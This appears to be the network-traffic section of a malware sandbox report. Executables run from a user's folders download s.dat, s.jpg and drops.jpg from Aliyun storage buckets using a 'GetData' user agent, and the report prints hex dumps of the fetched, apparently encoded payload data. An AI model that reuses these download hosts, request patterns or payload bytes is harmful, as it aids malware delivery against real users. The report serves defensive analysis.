                                                                                          5192.168.2.94997939.103.20.1054437616C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-11 03:44:00 UTC111OUTGET /s.dat HTTP/1.1
                                                                                          User-Agent: GetData
                                                                                          Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                                                                          Cache-Control: no-cache
                                                                                          2025-01-11 03:44:00 UTC560INHTTP/1.1 200 OK
                                                                                          Server: AliyunOSS
                                                                                          Date: Sat, 11 Jan 2025 03:44:00 GMT
                                                                                          Content-Type: application/octet-stream
                                                                                          Content-Length: 28272
                                                                                          Connection: close
                                                                                          x-oss-request-id: 6781E900F5B7DD3030CFDC7B
                                                                                          Accept-Ranges: bytes
                                                                                          ETag: "711743729566E50108AEDF7B2949D90F"
                                                                                          Last-Modified: Sat, 11 Jan 2025 03:43:51 GMT
                                                                                          x-oss-object-type: Normal
                                                                                          x-oss-hash-crc64ecma: 12336687731550963302
                                                                                          x-oss-storage-class: Standard
                                                                                          x-oss-ec: 0048-00000113
                                                                                          Content-Disposition: attachment
                                                                                          x-oss-force-download: true
                                                                                          Content-MD5: cRdDcpVm5QEIrt97KUnZDw==
                                                                                          x-oss-server-time: 7
                                                                                          2025-01-11 03:44:00 UTC3536INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                                                                                          Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
                                                                                          2025-01-11 03:44:00 UTC4096INData Raw: 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86
                                                                                          Data Ascii: _##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                                                                                          2025-01-11 03:44:00 UTC4096INData Raw: 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc
                                                                                          Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
                                                                                          2025-01-11 03:44:00 UTC4096INData Raw: 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41
                                                                                          Data Ascii: 0JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKSA
                                                                                          2025-01-11 03:44:01 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                                                                                          Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                                                                          2025-01-11 03:44:01 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                                                                          Data Ascii: ,$LDld=5}u]U
                                                                                          2025-01-11 03:44:01 UTC4096INData Raw: 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2
                                                                                          Data Ascii: G<EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                                                                          2025-01-11 03:44:01 UTC160INData Raw: bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 00 c5 c7 29
                                                                                          Data Ascii: VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS)


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.94998039.103.20.1054437616C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-11 03:44:03 UTC111OUTGET /s.jpg HTTP/1.1
                                                                                          User-Agent: GetData
                                                                                          Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                                                                          Cache-Control: no-cache
                                                                                          2025-01-11 03:44:03 UTC543INHTTP/1.1 200 OK
                                                                                          Server: AliyunOSS
                                                                                          Date: Sat, 11 Jan 2025 03:44:03 GMT
                                                                                          Content-Type: image/jpeg
                                                                                          Content-Length: 8299
                                                                                          Connection: close
                                                                                          x-oss-request-id: 6781E9035DFDD1373055CCAB
                                                                                          Accept-Ranges: bytes
                                                                                          ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                                                                          Last-Modified: Fri, 10 Jan 2025 12:30:53 GMT
                                                                                          x-oss-object-type: Normal
                                                                                          x-oss-hash-crc64ecma: 692387538176721524
                                                                                          x-oss-storage-class: Standard
                                                                                          x-oss-ec: 0048-00000104
                                                                                          Content-Disposition: attachment
                                                                                          x-oss-force-download: true
                                                                                          Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                                                                          x-oss-server-time: 3
                                                                                          2025-01-11 03:44:03 UTC3553INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                                          Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                                          2025-01-11 03:44:03 UTC4096INData Raw: 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 a5
                                                                                          Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                                                                                          2025-01-11 03:44:03 UTC650INData Raw: f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 90
                                                                                          Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.949981118.178.60.94434456C:\Users\user\Documents\XY3LL0.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-11 03:44:18 UTC114OUTGET /drops.jpg HTTP/1.1
                                                                                          User-Agent: GetData
                                                                                          Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                          Cache-Control: no-cache
                                                                                          2025-01-11 03:44:18 UTC545INHTTP/1.1 200 OK
                                                                                          Server: AliyunOSS
                                                                                          Date: Sat, 11 Jan 2025 03:44:18 GMT
                                                                                          Content-Type: image/jpeg
                                                                                          Content-Length: 37274
                                                                                          Connection: close
                                                                                          x-oss-request-id: 6781E912FDF0783130574233
                                                                                          Accept-Ranges: bytes
                                                                                          ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7"
                                                                                          Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT
                                                                                          x-oss-object-type: Normal
                                                                                          x-oss-hash-crc64ecma: 9193697774326766004
                                                                                          x-oss-storage-class: Standard
                                                                                          x-oss-ec: 0048-00000105
                                                                                          Content-Disposition: attachment
                                                                                          x-oss-force-download: true
                                                                                          Content-MD5: bU3rlSbzlz3g+dzpOS+Opw==
                                                                                          x-oss-server-time: 9
                                                                                          2025-01-11 03:44:18 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31
                                                                                          Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
                                                                                          2025-01-11 03:44:18 UTC4096INData Raw: b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11 cc
                                                                                          Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;|6@q_^/f
                                                                                          2025-01-11 03:44:18 UTC4096INData Raw: d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c d5
                                                                                          Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h|
                                                                                          2025-01-11 03:44:18 UTC4096INData Raw: 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89 38
                                                                                          Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR|u9g39Z_?|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-*Qm[Q27Gahf*'h&<yw98
                                                                                          2025-01-11 03:44:18 UTC4096INData Raw: 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14 56
                                                                                          Data Ascii: ;<=wJBDEVUV}*hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z*#i+l3y;!"#$bBoKtAqV
                                                                                          2025-01-11 03:44:18 UTC4096INData Raw: 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77 bb
                                                                                          Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
                                                                                          2025-01-11 03:44:18 UTC4096INData Raw: 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f b3
